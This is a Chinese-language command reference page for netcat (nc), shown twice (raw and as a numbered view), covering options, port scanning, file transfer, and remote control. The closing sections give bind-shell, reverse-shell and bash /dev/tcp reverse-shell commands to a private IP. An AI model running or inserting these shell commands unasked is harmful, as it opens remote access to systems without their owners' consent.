UNPKG

linux-command/command/nc.md

Version:

3.54 kBMarkdownView Raw

1nc
2===
3
4用于设置路由器，是网络工具中的瑞士军刀。
5
6## 补充说明
7
8**nc命令** 全称**netcat**，用于设置路由器。它能通过 TCP 和 UDP 在网络中读写数据。通过与其他工具结合和重定向，你可以在脚本中以多种方式使用它。使用 netcat 命令所能完成的事情令人惊讶。
9
10###  语法
11
12```shell
13nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>]
14[-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]
15```
16
17###  选项
18
19```shell
20-g <网关> # 设置路由器跃程通信网关，最多可设置8个。
21-G<指向器数目> # 设置来源路由指向器，其数值为4的倍数。
22-h 在线帮助。
23-i<延迟秒数> 设置时间间隔，以便传送信息及扫描通信端口。
24-l 使用监听模式，管控传入的资料。
25-n 直接使用IP地址，而不通过域名服务器。
26-o<输出文件> # 指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存。
27-p<通信端口> # 设置本地主机使用的通信端口。
28-r 乱数指定本地与远端主机的通信端口。
29-s<来源位址> # 设置本地主机送出数据包的IP地址。
30-u 使用UDP传输协议。
31-v 显示指令执行过程。
32-w<超时秒数> # 设置等待连线的时间。
33-z 使用0输入/输出模式，只在扫描通信端口时使用。
34```
35
36### 实例
37
38**TCP端口扫描**
39
40```shell
41[root@localhost ~]# nc -v -z -w2 192.168.0.3 1-100 
42192.168.0.3: inverse host lookup failed: Unknown host
43(UNKNOWN) [192.168.0.3] 80 (http) open
44(UNKNOWN) [192.168.0.3] 23 (telnet) open
45(UNKNOWN) [192.168.0.3] 22 (ssh) open
46```
47
48扫描192.168.0.3 的端口 范围是 1-100
49**扫描UDP端口**
50
51```shell
52[root@localhost ~]# nc -u -z -w2 192.168.0.3 1-1000  # 扫描192.168.0.3 的端口 范围是 1-1000
53```
54
55**扫描指定端口**
56
57```shell
58[root@localhost ~]# nc -nvv 192.168.0.1 80 # 扫描 80端口
59(UNKNOWN) [192.168.0.1] 80 (?) open
60y  //用户输入
61```
62
63查看从服务器到目的地的出站端口 443 是否被防火墙阻止
64
65```shell
66nc -vz acme-v02.api.letsencrypt.org 443 -w2
67# Ncat: Version 7.50 ( https://nmap.org/ncat )
68# Ncat: Connected to 23.77.214.183:443.
69# Ncat: 0 bytes sent, 0 bytes received in 0.07 seconds.
70```
71**文件传输**
72
73```shell
74# 接收方提前设置监听端口与要接收的文件名（文件名可自定义）：
75nc -lp 8888 > node.tar.gz
76
77# 传输方发文件：
78nc -nv 192.168.75.121 8888  < node_exporter-1.3.1.linux-amd64.tar.gz
79# ⚠️ 注意：192.168.75.121是接收方的ip地址。
80```
81
82```shell
83# 如果希望文件传输结束后自动退出，可以使用下面的命令：
84nc -lp 8888 > node.tar.gz
85nc -nv 192.168.75.121 8888 -i 1 < node_exporter-1.3.1.linux-amd64.tar.gz
86# ⚠️ 注意：-i 表示闲置超时时间
87```
88
89**远程控制**
90
91```shell
92# 正向控制，被控端主动设置监听端口及bash环境，控制端连接，如果有防火墙，需开放端口，否则会被拦截。
93# 被控制端执行下面的命令：
94nc -lvnp 8888 -c bash
95# 控制端执行下面的命令：
96nc 192.168.75.121 8888
97```
98
99```shell
100# 反向控制，控制端设置监听端口，被控端主动连接控制端的ip及端口，并提供bash环境。
101# 控制端执行下面的命令：
102nc -lvnp 8888
103# 被控制端执行下面的命令：
104nc 192.168.75.121 8888 -c bash
105```
106
107**反弹shell**
108
109```shell
110# 控制端执行下面的命令：
111nc -lvnp 8888
112```
113
114```
115# 被控端执行下面的命令:
116bash -i &> /dev/tcp/192.168.75.121/8888 0>&1
117```
118

1	`nc`
2	`===`
3
4	`用于设置路由器，是网络工具中的瑞士军刀。`
5
6	`## 补充说明`
7
8	`nc命令全称netcat，用于设置路由器。它能通过 TCP 和 UDP 在网络中读写数据。通过与其他工具结合和重定向，你可以在脚本中以多种方式使用它。使用 netcat 命令所能完成的事情令人惊讶。`
9
10	`### 语法`
11
12	```shell
13	`nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>]`
14	`[-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]`
15	```
16
17	`### 选项`
18
19	```shell
20	`-g <网关> # 设置路由器跃程通信网关，最多可设置8个。`
21	`-G<指向器数目> # 设置来源路由指向器，其数值为4的倍数。`
22	`-h 在线帮助。`
23	`-i<延迟秒数> 设置时间间隔，以便传送信息及扫描通信端口。`
24	`-l 使用监听模式，管控传入的资料。`
25	`-n 直接使用IP地址，而不通过域名服务器。`
26	`-o<输出文件> # 指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存。`
27	`-p<通信端口> # 设置本地主机使用的通信端口。`
28	`-r 乱数指定本地与远端主机的通信端口。`
29	`-s<来源位址> # 设置本地主机送出数据包的IP地址。`
30	`-u 使用UDP传输协议。`
31	`-v 显示指令执行过程。`
32	`-w<超时秒数> # 设置等待连线的时间。`
33	`-z 使用0输入/输出模式，只在扫描通信端口时使用。`
34	```
35
36	`### 实例`
37
38	`TCP端口扫描`
39
40	```shell
41	`[root@localhost ~]# nc -v -z -w2 192.168.0.3 1-100`
42	`192.168.0.3: inverse host lookup failed: Unknown host`
43	`(UNKNOWN) [192.168.0.3] 80 (http) open`
44	`(UNKNOWN) [192.168.0.3] 23 (telnet) open`
45	`(UNKNOWN) [192.168.0.3] 22 (ssh) open`
46	```
47
48	`扫描192.168.0.3 的端口范围是 1-100`
49	`扫描UDP端口`
50
51	```shell
52	`[root@localhost ~]# nc -u -z -w2 192.168.0.3 1-1000 # 扫描192.168.0.3 的端口范围是 1-1000`
53	```
54
55	`扫描指定端口`
56
57	```shell
58	`[root@localhost ~]# nc -nvv 192.168.0.1 80 # 扫描 80端口`
59	`(UNKNOWN) [192.168.0.1] 80 (?) open`
60	`y //用户输入`
61	```
62
63	`查看从服务器到目的地的出站端口 443 是否被防火墙阻止`
64
65	```shell
66	`nc -vz acme-v02.api.letsencrypt.org 443 -w2`
67	`# Ncat: Version 7.50 ( https://nmap.org/ncat )`
68	`# Ncat: Connected to 23.77.214.183:443.`
69	`# Ncat: 0 bytes sent, 0 bytes received in 0.07 seconds.`
70	```
71	`文件传输`
72
73	```shell
74	`# 接收方提前设置监听端口与要接收的文件名（文件名可自定义）：`
75	`nc -lp 8888 > node.tar.gz`
76
77	`# 传输方发文件：`
78	`nc -nv 192.168.75.121 8888 < node_exporter-1.3.1.linux-amd64.tar.gz`
79	`# ⚠️ 注意：192.168.75.121是接收方的ip地址。`
80	```
81
82	```shell
83	`# 如果希望文件传输结束后自动退出，可以使用下面的命令：`
84	`nc -lp 8888 > node.tar.gz`
85	`nc -nv 192.168.75.121 8888 -i 1 < node_exporter-1.3.1.linux-amd64.tar.gz`
86	`# ⚠️ 注意：-i 表示闲置超时时间`
87	```
88
89	`远程控制`
90
91	```shell
92	`# 正向控制，被控端主动设置监听端口及bash环境，控制端连接，如果有防火墙，需开放端口，否则会被拦截。`
93	`# 被控制端执行下面的命令：`
94	`nc -lvnp 8888 -c bash`
95	`# 控制端执行下面的命令：`
96	`nc 192.168.75.121 8888`
97	```
98
99	```shell
100	`# 反向控制，控制端设置监听端口，被控端主动连接控制端的ip及端口，并提供bash环境。`
101	`# 控制端执行下面的命令：`
102	`nc -lvnp 8888`
103	`# 被控制端执行下面的命令：`
104	`nc 192.168.75.121 8888 -c bash`
105	```
106
107	`反弹shell`
108
109	```shell
110	`# 控制端执行下面的命令：`
111	`nc -lvnp 8888`
112	```
113
114	```
115	`# 被控端执行下面的命令:`
116	`bash -i &> /dev/tcp/192.168.75.121/8888 0>&1`
117	```
118